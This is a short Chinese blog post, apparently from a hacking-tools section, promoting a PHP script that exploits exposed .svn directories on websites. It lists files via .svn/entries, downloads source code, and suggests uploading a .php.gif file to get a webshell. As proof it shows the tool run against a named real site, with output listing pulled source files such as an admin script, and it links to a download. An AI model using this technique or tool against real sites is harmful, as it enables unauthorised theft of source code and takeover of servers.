.svn目录泄漏利用脚本

  • A+
所属分类:神兵利刃
感谢leehenwu投递

有的站点使用.svn来做生产环境版本控制,但是.svn目录没有做访问权限限制,可以通过.svn/entries来遍历文件和目录列表。 为了节约体力,我写了一个php脚本来做这件事,如果*.php.svn-base不被当.php来执行,那么恭喜你,svn中的.php程序源码随你下了,分析源码可能能帮助你发现更多漏洞。 如果.php.svn-base被当成php文件来执行了,可能看到php错误信息(看到真实路径)或内容为空白,那么,同样恭喜你,这个站点有扩展名识别问题,找地方上传xxx.php.gif也许就可以直接得到webshell了。
漏洞证明:/usr/local/bin/svn_clone -cvvvu http://www.2.newsmth.net
*** 下载bbspsttmpl.php 文件
写入bbspsttmpl.php 到/data/src/www.2.newsmth.net (4190 bytes)
*** 下载default-sf.css 文件
写入default-sf.css 到/data/src/www.2.newsmth.net (9700 bytes)
*** 下载www2-admin.php 文件
写入www2-admin.php 到/data/src/www.2.newsmth.net (1819 bytes)
*** 下载bbspst.php 文件
写入bbspst.php 到/data/src/www.2.newsmth.net (2716 bytes)

下载地址:http://rains.im/?q=node/18

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: